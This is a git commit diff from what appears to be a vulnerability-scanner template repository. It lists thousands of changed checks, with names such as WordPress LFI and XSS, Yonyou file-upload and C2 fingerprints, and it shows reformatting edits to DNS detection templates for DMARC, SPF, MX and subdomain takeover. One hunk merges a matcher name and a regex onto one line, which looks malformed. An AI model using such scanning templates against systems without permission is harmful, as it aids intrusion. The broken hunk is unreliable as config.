.../wordpress/hb-audio-lfi.yaml | 6 +- .../wordpress/health-check-lfi.yaml | 3 +- .../wordpress/hide-security-enhancer-lfi.yaml | 4 +- .../wordpress/issuu-panel-lfi.yaml | 3 +- .../wordpress/ldap-wp-login-xss.yaml | 3 +- .../leaguemanager-sql-injection.yaml | 4 +- .../wordpress/members-list-xss.yaml | 2 +- .../wordpress/modula-image-gallery-xss.yaml | 7 +- .../wordpress/mthemeunus-lfi.yaml | 2 +- .../wordpress/music-store-open-redirect.yaml | 2 +- .../wordpress/my-chatbot-xss.yaml | 3 +- .../wordpress/nativechurch-wp-theme-lfd.yaml | 2 +- .../wordpress/new-user-approve-xss.yaml | 8 +- .../wordpress/newsletter-open-redirect.yaml | 5 +- .../wordpress/notificationx-sqli.yaml | 7 +- .../wordpress/photo-gallery-xss.yaml | 6 +- .../wordpress/pieregister-open-redirect.yaml | 2 +- .../wordpress/sassy-social-share.yaml | 2 +- .../wordpress/seatreg-redirect.yaml | 4 +- .../wordpress/seo-redirection-xss.yaml | 5 +- .../wordpress/shortcode-lfi.yaml | 6 +- .../shortpixel-image-optimizer-xss.yaml | 7 +- .../ultimatemember-open-redirect.yaml | 2 +- ...unauthenticated-duplicator-disclosure.yaml | 3 +- .../wordpress/w3c-total-cache-ssrf.yaml | 2 +- http/vulnerabilities/wordpress/watu-xss.yaml | 3 +- .../weekender-newspaper-open-redirect.yaml | 2 +- .../woocommerce-pdf-invoices-xss.yaml | 4 +- .../wordpress-accessible-wpconfig.yaml | 1 + .../wordpress/wordpress-affiliatewp-log.yaml | 2 +- .../wordpress-bbpress-plugin-listing.yaml | 2 +- .../wordpress-db-backup-listing.yaml | 4 +- .../wordpress/wordpress-db-backup.yaml | 6 +- .../wordpress/wordpress-db-repair.yaml | 2 +- .../wordpress/wordpress-debug-log.yaml | 4 +- .../wordpress-directory-listing.yaml | 2 +- .../wordpress-elementor-plugin-listing.yaml | 2 +- .../wordpress/wordpress-emergency-script.yaml | 5 +- .../wordpress/wordpress-git-config.yaml | 2 +- .../wordpress-gtranslate-plugin-listing.yaml | 2 +- .../wordpress/wordpress-installer-log.yaml | 6 +- .../wordpress-rce-simplefilelist.yaml | 5 +- .../wordpress/wordpress-rdf-user-enum.yaml | 4 +- .../wordpress-redirection-plugin-listing.yaml | 2 +- .../wordpress-social-metrics-tracker.yaml | 2 +- .../wordpress/wordpress-ssrf-oembed.yaml | 3 +- .../wordpress/wordpress-tmm-db-migrate.yaml | 5 +- ...ordpress-total-upkeep-backup-download.yaml | 5 +- .../wordpress-updraftplus-pem-key.yaml | 2 +- .../wordpress/wordpress-user-enum.yaml | 3 +- .../wordpress-woocommerce-listing.yaml | 3 +- .../wordpress/wordpress-wordfence-lfi.yaml | 3 +- .../wordpress-wordfence-waf-bypass-xss.yaml | 2 +- .../wordpress/wordpress-wordfence-xss.yaml | 2 +- .../wordpress/wordpress-wp-cron.yaml | 3 +- .../wordpress-xmlrpc-listmethods.yaml | 5 +- .../wordpress/wordpress-zebra-form-xss.yaml | 2 +- .../wp-123contactform-plugin-listing.yaml | 2 +- .../wordpress/wp-adaptive-xss.yaml | 2 +- .../wordpress/wp-all-export-xss.yaml | 8 +- .../wordpress/wp-altair-listing.yaml | 2 +- .../wordpress/wp-ambience-xss.yaml | 2 +- .../wordpress/wp-arforms-listing.yaml | 5 +- .../wp-autosuggest-sql-injection.yaml | 2 +- .../wordpress/wp-blogroll-fun-xss.yaml | 6 +- .../wordpress/wp-code-snippets-xss.yaml | 4 +- .../wordpress/wp-config-setup.yaml | 2 +- .../wordpress/wp-custom-tables-xss.yaml | 2 +- .../wp-email-subscribers-listing.yaml | 5 +- .../wordpress/wp-enabled-registration.yaml | 2 +- .../wordpress/wp-finder-xss.yaml | 2 +- .../wordpress/wp-flagem-xss.yaml | 2 +- .../wordpress/wp-full-path-disclosure.yaml | 2 +- .../wordpress/wp-grimag-open-redirect.yaml | 2 +- .../wp-gtranslate-open-redirect.yaml | 3 +- .../wordpress/wp-haberadam-idor.yaml | 1 + .../wp-idx-broker-platinum-listing.yaml | 4 +- .../wordpress/wp-insert-php-xss.yaml | 4 +- .../wordpress/wp-iwp-client-listing.yaml | 2 +- .../wordpress/wp-javospot-lfi.yaml | 2 +- .../wordpress/wp-knews-xss.yaml | 2 +- .../wordpress/wp-license-file.yaml | 2 +- .../wordpress/wp-mailchimp-log-exposure.yaml | 2 +- .../wp-memphis-documents-library-lfi.yaml | 2 +- .../wordpress/wp-multiple-theme-ssrf.yaml | 2 +- .../wordpress/wp-nextgen-xss.yaml | 2 +- .../wordpress/wp-oxygen-theme-lfi.yaml | 2 +- .../wordpress/wp-phpfreechat-xss.yaml | 2 +- .../wp-plugin-1-flashgallery-listing.yaml | 3 +- .../wordpress/wp-plugin-lifterlms.yaml | 3 +- .../wordpress/wp-plugin-utlimate-member.yaml | 2 +- .../wordpress/wp-popup-listing.yaml | 2 +- .../wordpress/wp-prostore-open-redirect.yaml | 2 +- .../wordpress/wp-qards-listing.yaml | 2 +- .../wordpress/wp-real-estate-xss.yaml | 4 +- .../wordpress/wp-related-post-xss.yaml | 4 +- .../wordpress/wp-securimage-xss.yaml | 2 +- .../wordpress/wp-security-open-redirect.yaml | 2 +- .../wordpress/wp-sfwd-lms-listing.yaml | 2 +- .../wordpress/wp-simple-fields-lfi.yaml | 2 +- .../wordpress/wp-slideshow-xss.yaml | 8 +- .../wordpress/wp-socialfit-xss.yaml | 4 +- .../wordpress/wp-spot-premium-lfi.yaml | 2 +- .../wordpress/wp-super-forms.yaml | 3 +- http/vulnerabilities/wordpress/wp-sym404.yaml | 2 +- .../wordpress/wp-tinymce-lfi.yaml | 2 +- .../wordpress/wp-touch-redirect.yaml | 2 +- .../wordpress/wp-tutor-lfi.yaml | 2 +- .../wordpress/wp-under-construction-ssrf.yaml | 2 +- .../wordpress/wp-upload-data.yaml | 2 +- .../wordpress/wp-vault-lfi.yaml | 3 +- .../wp-woocommerce-email-verification.yaml | 5 +- .../wp-woocommerce-file-download.yaml | 2 +- .../wp-woocommerce-pdf-invoice-listing.yaml | 11 +- .../wordpress/wp-xmlrpc-brute-force.yaml | 2 +- .../wp-xmlrpc-pingback-detection.yaml | 2 +- http/vulnerabilities/wordpress/wp-xmlrpc.yaml | 3 +- .../wordpress/wp-yoast-user-enumeration.yaml | 2 +- .../wordpress/wpdm-cache-session.yaml | 5 +- .../wordpress/wpify-woo-czech-xss.yaml | 2 +- http/vulnerabilities/wordpress/wpml-xss.yaml | 8 +- .../wordpress/wpmudev-pub-keys.yaml | 5 +- .../wordpress/wptouch-open-redirect.yaml | 2 +- .../wordpress/wptouch-xss.yaml | 4 +- .../wordpress/zero-spam-sql-injection.yaml | 6 +- .../yonyou/chanjet-gnremote-sqli.yaml | 5 +- .../yonyou/chanjet-tplus-checkmutex-sqli.yaml | 4 +- .../yonyou/chanjet-tplus-file-read.yaml | 4 +- .../yonyou/chanjet-tplus-fileupload.yaml | 5 +- .../yonyou/chanjet-tplus-ufida-sqli.yaml | 4 +- .../yonyou/erp-nc-directory-traversal.yaml | 2 +- .../grp-u8-uploadfiledata-fileupload.yaml | 5 +- .../yonyou/wooyun-path-traversal.yaml | 3 +- .../yonyou/yonyou-fe-directory-traversal.yaml | 6 +- .../yonyou-filereceiveservlet-fileupload.yaml | 8 +- .../yonyou/yonyou-grp-u8-xxe.yaml | 3 +- .../yonyou/yonyou-nc-accept-fileupload.yaml | 5 +- .../yonyou-nc-baseapp-deserialization.yaml | 6 +- .../yonyou-nc-dispatcher-fileupload.yaml | 7 +- .../yonyou-nc-grouptemplet-fileupload.yaml | 6 +- .../yonyou/yonyou-nc-info-leak.yaml | 4 +- .../yonyou-nc-ncmessageservlet-rce.yaml | 7 +- .../yonyou/yonyou-u8-crm-fileupload.yaml | 6 +- .../yonyou/yonyou-u8-crm-lfi.yaml | 6 +- .../yonyou/yonyou-u8-oa-sqli.yaml | 5 +- .../yonyou/yonyou-u8-sqli.yaml | 5 +- http/vulnerabilities/zend/zend-v1-xss.yaml | 3 +- .../zyxel/unauth-lfd-zhttpd.yaml | 2 +- .../zyxel/unauth-ztp-ping.yaml | 2 +- .../zzzcms/zzzcms-info-disclosure.yaml | 2 +- http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml | 3 +- http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 3 +- network/cves/2022/CVE-2022-31793.yaml | 3 +- network/detection/java-rmi-detect.yaml | 7 +- network/detection/weblogic-iiop-detect.yaml | 4 +- network/detection/weblogic-t3-detect.yaml | 29 +- network/jarm/c2/cobalt-strike-c2-jarm.yaml | 7 +- network/jarm/c2/covenant-c2-jarm.yaml | 5 +- network/jarm/c2/deimos-c2-jarm.yaml | 5 +- network/jarm/c2/evilginx2-jarm.yaml | 5 +- network/jarm/c2/generic-c2-jarm.yaml | 2 - network/jarm/c2/grat2-c2-jarm.yaml | 5 +- network/jarm/c2/havoc-c2-jarm.yaml | 9 +- network/jarm/c2/mac-c2-jarm.yaml | 5 +- network/jarm/c2/macshell-c2-jarm.yaml | 5 +- network/jarm/c2/merlin-c2-jarm.yaml | 5 +- network/jarm/c2/metasploit-c2-jarm.yaml | 5 +- network/jarm/c2/mythic-c2-jarm.yaml | 5 +- network/jarm/c2/posh-c2-jarm.yaml | 5 +- network/jarm/c2/shad0w-c2-jarm.yaml | 5 +- network/jarm/c2/silenttrinity-c2-jarm.yaml | 5 +- network/jarm/c2/sliver-c2-jarm.yaml | 5 +- ssl/c2/asyncrat-c2.yaml | 4 +- ssl/c2/bitrat-c2.yaml | 6 +- ssl/c2/cobalt-strike-c2.yaml | 6 +- ssl/c2/covenant-c2-ssl.yaml | 4 +- ssl/c2/dcrat-server-c2.yaml | 6 +- ssl/c2/gozi-malware-c2.yaml | 6 +- ssl/c2/havoc-c2.yaml | 8 +- ssl/c2/icedid.yaml | 6 +- ssl/c2/metasploit-c2.yaml | 4 +- ssl/c2/mythic-c2-ssl.yaml | 4 +- ssl/c2/orcus-rat-c2.yaml | 6 +- ssl/c2/posh-c2.yaml | 4 +- ssl/c2/quasar-rat-c2.yaml | 4 +- ssl/c2/shadowpad-c2.yaml | 6 +- ssl/detect-ssl-issuer.yaml | 3 +- ssl/expired-ssl.yaml | 10 +- ssl/insecure-cipher-suite-detect.yaml | 820 ++-- ssl/kubernetes-fake-certificate.yaml | 4 +- ssl/mismatched-ssl-certificate.yaml | 10 +- ssl/revoked-ssl-certificate.yaml | 6 +- ssl/self-signed-ssl.yaml | 8 +- ssl/ssl-dns-names.yaml | 5 +- ssl/tls-version.yaml | 3 +- ssl/untrusted-root-certificate.yaml | 6 +- ssl/weak-cipher-suites.yaml | 11 +- workflows/74cms-workflow.yaml | 3 +- workflows/acrolinx-workflow.yaml | 1 - workflows/activemq-workflow.yaml | 1 - workflows/adminer-workflow.yaml | 3 +- workflows/aem-workflow.yaml | 1 - workflows/airflow-workflow.yaml | 4 +- workflows/ambari-workflow.yaml | 1 - workflows/apache-workflow.yaml | 1 - workflows/apereo-cas-workflow.yaml | 1 - workflows/apisix-workflow.yaml | 3 +- workflows/artica-web-proxy-workflow.yaml | 3 +- workflows/artifactory-workflow.yaml | 1 - workflows/avantfax-workflow.yaml | 1 - workflows/aviatrix-workflow.yaml | 1 - workflows/axigen-workflow.yaml | 3 +- workflows/azkaban-workflow.yaml | 1 - workflows/azure-workflow.yaml | 1 - workflows/b2evolution-workflow.yaml | 3 +- workflows/bigip-workflow.yaml | 1 - workflows/bitrix-workflow.yaml | 1 - workflows/bomgar-workflow.yaml | 1 - workflows/bullwark-workflow.yaml | 3 +- workflows/cacti-workflow.yaml | 3 +- workflows/centos-workflow.yaml | 1 - workflows/chamilo-workflow.yaml | 3 +- workflows/checkpoint-workflow.yaml | 1 - workflows/cherokee-workflow.yaml | 3 +- workflows/circarlife-workflow.yaml | 1 - workflows/cisco-asa-workflow.yaml | 5 +- workflows/cisco-meraki-workflow.yaml | 3 +- workflows/cockpit-workflow.yaml | 5 +- workflows/cocoon-workflow.yaml | 1 - workflows/coldfusion-workflow.yaml | 1 - workflows/concrete-workflow.yaml | 1 - workflows/confluence-workflow.yaml | 2 - workflows/dahua-workflow.yaml | 3 +- workflows/dedecms-workflow.yaml | 1 - workflows/default-application-workflow.yaml | 15 +- workflows/dell-idrac-workflow.yaml | 3 +- workflows/dolibarr-workflow.yaml | 3 +- workflows/dotnetnuke-workflow.yaml | 3 +- workflows/drupal-workflow.yaml | 3 +- workflows/duomicms-workflow.yaml | 3 +- workflows/dynamicweb-workflow.yaml | 3 +- workflows/emby-workflow.yaml | 3 +- workflows/emerge-workflow.yaml | 1 - workflows/episerver-workflow.yaml | 3 +- workflows/feifeicms-workflow.yaml | 3 +- workflows/finereport-workflow.yaml | 3 +- workflows/fortinet-workflow.yaml | 1 - workflows/gateone-workflow.yaml | 3 +- workflows/geowebserver-workflow.yaml | 1 - workflows/gespage-workflow.yaml | 1 - workflows/gitlab-workflow.yaml | 3 +- workflows/gitlist-workflow.yaml | 3 +- workflows/glpi-workflow.yaml | 1 - workflows/gocd-workflow.yaml | 1 - workflows/gogs-workflow.yaml | 1 - .../google-api-enumeration-workflow.yaml | 25 +- workflows/gophish-workflow.yaml | 1 - workflows/grafana-workflow.yaml | 1 - workflows/graphite-workflow.yaml | 1 - workflows/grav-workflow.yaml | 1 - workflows/gsoap-workflow.yaml | 1 - workflows/guacamole-workflow.yaml | 3 +- workflows/h3c-imc-workflow.yaml | 3 +- workflows/harbor-workflow.yaml | 3 +- workflows/hikvision-workflow.yaml | 4 +- workflows/igs-workflow.yaml | 1 - workflows/itop-workflow.yaml | 1 - workflows/jboss-workflow.yaml | 3 +- workflows/jeedom-workflow.yaml | 1 - workflows/jellyfin-workflow.yaml | 2 +- workflows/jenkins-workflow.yaml | 4 +- workflows/jetty-workflow.yaml | 1 - workflows/jira-workflow.yaml | 3 +- workflows/joomla-workflow.yaml | 1 - workflows/kentico-workflow.yaml | 3 +- workflows/kev-workflow.yaml | 1 - workflows/keycloak-workflow.yaml | 1 - workflows/kibana-workflow.yaml | 1 - workflows/kindeditor-workflow.yaml | 3 +- workflows/kong-workflow.yaml | 3 +- workflows/lanproxy-workflow.yaml | 3 +- workflows/lansweeper-workflow.yaml | 1 - workflows/laravel-workflow.yaml | 3 +- workflows/liferay-workflow.yaml | 1 - workflows/lotus-domino-workflow.yaml | 3 +- workflows/lucee-workflow.yaml | 1 - workflows/magento-workflow.yaml | 3 +- workflows/magmi-workflow.yaml | 3 +- workflows/maian-workflow.yaml | 3 +- workflows/mantisbt-workflow.yaml | 1 - workflows/mautic-workflow.yaml | 3 +- workflows/metabase-workflow.yaml | 1 - workflows/metinfo-workflow.yaml | 3 +- workflows/micro-focus-workflow.yaml | 3 +- workflows/microsoft-exchange-workflow.yaml | 3 +- workflows/microstrategy-workflow.yaml | 3 +- workflows/mida-eframework-workflow.yaml | 1 - workflows/mobileiron-workflow.yaml | 3 +- workflows/moodle-workflow.yaml | 1 - workflows/movable-workflow.yaml | 3 +- workflows/netgear-workflow.yaml | 3 +- workflows/netsweeper-workflow.yaml | 3 +- workflows/nette-workflow.yaml | 3 +- workflows/node-red-workflow.yaml | 1 - workflows/novnc-workflow.yaml | 3 +- workflows/ofbiz-workflow.yaml | 1 - workflows/openam-workflow.yaml | 1 - workflows/openemr-workflow.yaml | 1 - workflows/opensis-workflow.yaml | 1 - workflows/opensns-workflow.yaml | 3 +- workflows/oracle-peoplesoft-workflow.yaml | 4 +- workflows/oscommerce-workflow.yaml | 3 +- workflows/pandora-workflow.yaml | 1 - workflows/pega-workflow.yaml | 1 - workflows/pentaho-workflow.yaml | 1 - workflows/phpcollab-workflow.yaml | 1 - workflows/phpmyadmin-workflow.yaml | 1 - workflows/phppgadmin-workflow.yaml | 3 +- workflows/phpwiki-workflow.yaml | 3 +- workflows/powercreator-workflow.yaml | 3 +- workflows/processmaker-workflow.yaml | 3 +- workflows/prometheus-workflow.yaml | 3 +- workflows/prtg-workflow.yaml | 3 +- workflows/pulsesecure-workflow.yaml | 3 +- workflows/qcubed-workflow.yaml | 3 +- workflows/r-seenet-workflow.yaml | 1 - workflows/rabbitmq-workflow.yaml | 4 +- workflows/rancher-workflow.yaml | 1 - workflows/rconfig-workflow.yaml | 1 - workflows/ricoh-workflow.yaml | 3 +- workflows/rosariosis-workflow.yaml | 1 - workflows/rstudio-workflow.yaml | 3 +- workflows/ruijie-workflow.yaml | 3 +- workflows/saltstack-workflow.yaml | 3 +- workflows/samsung-wlan-ap-workflow.yaml | 4 +- workflows/sap-netweaver-workflow.yaml | 10 +- workflows/sarg-workflow.yaml | 3 +- workflows/sco-workflow.yaml | 3 +- workflows/sequoiadb-workflow.yaml | 1 - workflows/sharepoint-workflow.yaml | 3 +- workflows/shopxo-workflow.yaml | 3 +- workflows/sidekiq-workflow.yaml | 1 - workflows/sitecore-workflow.yaml | 3 +- workflows/skywalking-workflow.yaml | 3 +- workflows/solarwinds-orion-workflow.yaml | 5 +- workflows/solr-workflow.yaml | 1 - workflows/sonarqube-workflow.yaml | 3 +- workflows/sourcebans-workflow.yaml | 3 +- workflows/splunk-workflow.yaml | 3 +- workflows/springboot-workflow.yaml | 1 - workflows/squirrelmail-workflow.yaml | 1 - workflows/subrion-workflow.yaml | 3 +- workflows/sugarcrm-workflow.yaml | 3 +- workflows/symfony-workflow.yaml | 1 - workflows/sysaid-workflow.yaml | 3 +- workflows/tapestry-workflow.yaml | 1 - workflows/terramaster-workflow.yaml | 1 - workflows/thinfinity-workflow.yaml | 1 - workflows/thinkadmin-workflow.yaml | 3 +- workflows/thinkcmf-workflow.yaml | 1 - workflows/thinkphp-workflow.yaml | 1 - workflows/thruk-workflow.yaml | 1 - workflows/tikiwiki-workflow.yaml | 1 - workflows/tomcat-workflow.yaml | 1 - workflows/tongda-workflow.yaml | 1 - workflows/tpshop-workflow.yaml | 1 - workflows/traefik-workflow.yaml | 1 - workflows/umbraco-workflow.yaml | 3 +- workflows/vbulletin-workflow.yaml | 2 +- workflows/vmware-workflow.yaml | 1 - workflows/voipmonitor-workflow.yaml | 1 - workflows/weblogic-workflow.yaml | 1 - workflows/webmin-workflow.yaml | 1 - workflows/websvn-workflow.yaml | 3 +- workflows/wordpress-workflow.yaml | 2 - workflows/worksite-takeover-workflow.yaml | 1 - workflows/wuzhicms-workflow.yaml | 1 - workflows/xdcms-workflow.yaml | 3 +- workflows/xiuno-workflow.yaml | 3 +- workflows/xxljob-workflow.yaml | 1 - workflows/yapi-workflow.yaml | 3 +- workflows/yii-workflow.yaml | 3 +- workflows/yonyou-nc-workflow.yaml | 1 - workflows/zabbix-workflow.yaml | 1 - workflows/zcms-workflow.yaml | 3 +- workflows/zeroshell-workflow.yaml | 3 +- workflows/zimbra-workflow.yaml | 1 - workflows/zzzcms-workflow.yaml | 3 +- 6920 files changed, 20821 insertions(+), 14572 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index f9676edb1a..e2a1f47dc7 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-404 - tags: dns,takeover,azure metadata: max-request: 1 + tags: dns,takeover,azure dns: - name: "{{FQDN}}" diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml index f3682db62b..8acbd4d60e 100644 --- a/dns/caa-fingerprint.yaml +++ b/dns/caa-fingerprint.yaml @@ -9,14 +9,13 @@ info: - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record classification: cwe-id: CWE-200 - tags: dns,caa metadata: max-request: 1 + tags: dns,caa dns: - name: "{{FQDN}}" type: CAA - matchers: - type: regex regex: @@ -28,4 +27,4 @@ dns: regex: - 'issue "(.*)"' - 'issuewild "(.*)"' - - 'iodef "(.*)"' \ No newline at end of file + - 'iodef "(.*)"' diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 3c3910eba5..48c71c8186 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -12,9 +12,9 @@ info: - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover classification: cwe-id: CWE-200 - tags: dns,takeover metadata: max-request: 1 + tags: dns,takeover dns: - name: "{{FQDN}}" @@ -33,4 +33,4 @@ dns: extractors: - type: dsl dsl: - - cname \ No newline at end of file + - cname diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index dc180b7178..b5bd6c0f6b 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -11,16 +11,15 @@ info: - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: dns,dmarc metadata: max-request: 1 + tags: dns,dmarc dns: - name: "_dmarc.{{FQDN}}" type: TXT - matchers: - type: regex part: answer @@ -31,4 +30,4 @@ dns: - type: regex group: 1 regex: - - "IN\tTXT\t(.+)" \ No newline at end of file + - "IN\tTXT\t(.+)" diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 6805bb5d6e..1c2ecfc6bc 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -254,8 +254,7 @@ dns: - type: word part: answer - name: adobe-marketo - - 'mkto-.{5,8}\.com' + name: adobe-marketo - 'mkto-.{5,8}\.com' - type: word part: answer @@ -349,7 +348,7 @@ dns: words: - zdassets.com - zdorigin.com - - zendesk.com + - "zendesk.com" - zopim.com - type: word diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 710ca1d46e..cb214dc5a5 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -7,9 +7,9 @@ info: description: A DNS WAF was detected. classification: cwe-id: CWE-200 - tags: tech,waf,dns metadata: max-request: 2 + tags: tech,waf,dns dns: - name: "{{FQDN}}" @@ -17,7 +17,6 @@ dns: - name: "{{FQDN}}" type: NS - matchers: - type: word part: answer @@ -192,4 +191,4 @@ dns: part: answer name: edns words: - - ".iidns.com" \ No newline at end of file + - ".iidns.com" diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 9c85f26c5c..e2047268b8 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -10,16 +10,15 @@ info: - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ classification: cwe-id: CWE-200 - tags: dns,dnssec metadata: max-request: 1 + tags: dns,dnssec dns: - name: "{{FQDN}}" type: DS - matchers: - type: regex part: answer regex: - - "IN\tDS\\t(.+)$" \ No newline at end of file + - "IN\tDS\\t(.+)$" diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index d120c45b06..6d58b31079 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -9,9 +9,9 @@ info: - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state classification: cwe-id: CWE-200 - tags: dns,ec2,aws metadata: max-request: 1 + tags: dns,ec2,aws dns: - name: "{{FQDN}}" @@ -21,4 +21,4 @@ dns: - type: regex regex: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" \ No newline at end of file + - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" diff --git a/dns/elasticbeanstalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml index 336a08f87e..3ec2fa9ef8 100644 --- a/dns/elasticbeanstalk-takeover.yaml +++ b/dns/elasticbeanstalk-takeover.yaml @@ -4,8 +4,7 @@ info: name: ElasticBeanstalk Subdomain Takeover Detection author: philippedelteil,rotemreiss,zy9ard3,joaonevess severity: high - description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical - name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. + description: ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 - https://twitter.com/payloadartist/status/1362035009863880711 diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml index a207076ae0..e744b0ca7b 100644 --- a/dns/mx-fingerprint.yaml +++ b/dns/mx-fingerprint.yaml @@ -10,14 +10,13 @@ info: - https://mxtoolbox.com/ classification: cwe-id: CWE-200 - tags: dns,mx metadata: max-request: 1 + tags: dns,mx dns: - name: "{{FQDN}}" type: MX - matchers: - type: regex part: answer @@ -28,4 +27,4 @@ dns: - type: regex group: 1 regex: - - "IN\tMX\t(.+)" \ No newline at end of file + - "IN\tMX\t(.+)" diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index dcf4e9b712..2270d5fa57 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -7,9 +7,9 @@ info: description: An email service was detected. Check the email service or spam filter that is used for a domain. classification: cwe-id: CWE-200 - tags: dns,service metadata: max-request: 1 + tags: dns,service dns: - name: "{{FQDN}}" @@ -80,4 +80,4 @@ dns: name: "Proofpoint US" words: - "mx1-us1.ppe-hosted.com" - - "mx2-us1.ppe-hosted.com" \ No newline at end of file + - "mx2-us1.ppe-hosted.com" diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml index 01884975e3..9876adf2c9 100644 --- a/dns/nameserver-fingerprint.yaml +++ b/dns/nameserver-fingerprint.yaml @@ -7,14 +7,13 @@ info: description: An NS record was detected. An NS record delegates a subdomain to a set of name servers. classification: cwe-id: CWE-200 - tags: dns,ns metadata: max-request: 1 + tags: dns,ns dns: - name: "{{FQDN}}" type: NS - matchers: - type: regex part: answer @@ -25,4 +24,4 @@ dns: - type: regex group: 1 regex: - - "IN\tNS\t(.+)" \ No newline at end of file + - "IN\tNS\t(.+)" diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml index 6de1477943..5b3c4a4f27 100644 --- a/dns/ptr-fingerprint.yaml +++ b/dns/ptr-fingerprint.yaml @@ -7,14 +7,13 @@ info: description: A PTR record was detected. A PTR record refers to the domain name. classification: cwe-id: CWE-200 - tags: dns,ptr metadata: max-request: 1 + tags: dns,ptr dns: - name: "{{FQDN}}" type: PTR - matchers: - type: regex part: answer @@ -25,4 +24,4 @@ dns: - type: regex group: 1 regex: - - "IN\tPTR\t(.+)" \ No newline at end of file + - "IN\tPTR\t(.+)" diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 87ed12bcf8..16b910addd 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -4,20 +4,18 @@ info: name: DNS Servfail Host Finder author: pdteam severity: info - description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary - networking issue. + description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary networking issue. classification: cwe-id: CWE-200 - tags: dns,takeover metadata: max-request: 1 + tags: dns,takeover dns: - name: "{{FQDN}}" type: A - matchers: - type: word words: - "SERVFAIL" - - "REFUSED" \ No newline at end of file + - "REFUSED" diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index 6b99404335..f5c78abc70 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -9,17 +9,16 @@ info: - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability classification: cwe-id: CWE-200 - tags: dns,spf metadata: max-request: 1 + tags: dns,spf dns: - name: "{{FQDN}}" type: TXT - matchers: - type: word words: - "v=spf1" - " ptr " - condition: and \ No newline at end of file + condition: and diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml index 382e3e5f61..00ccb12969 100644 --- a/dns/txt-fingerprint.yaml +++ b/dns/txt-fingerprint.yaml @@ -9,14 +9,13 @@ info: - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/ classification: cwe-id: CWE-200 - tags: dns,txt metadata: max-request: 1 + tags: dns,txt dns: - name: "{{FQDN}}" type: TXT - matchers: - type: regex part: answer @@ -27,4 +26,4 @@ dns: - type: regex group: 1 regex: - - "IN\tTXT\t(.+)" \ No newline at end of file + - "IN\tTXT\t(.+)" diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 4122359917..ba46e560dd 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -9,15 +9,14 @@ info: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites classification: cwe-id: CWE-200 - tags: dns,service metadata: max-request: 1 + tags: dns,service dns: - name: "{{FQDN}}" type: A - matchers: - type: word words: - - "69.164.223.206" \ No newline at end of file + - "69.164.223.206" diff --git a/file/android/adb-backup-enabled.yaml b/file/android/adb-backup-enabled.yaml index f35f8e7d5a..6271b8435d 100644 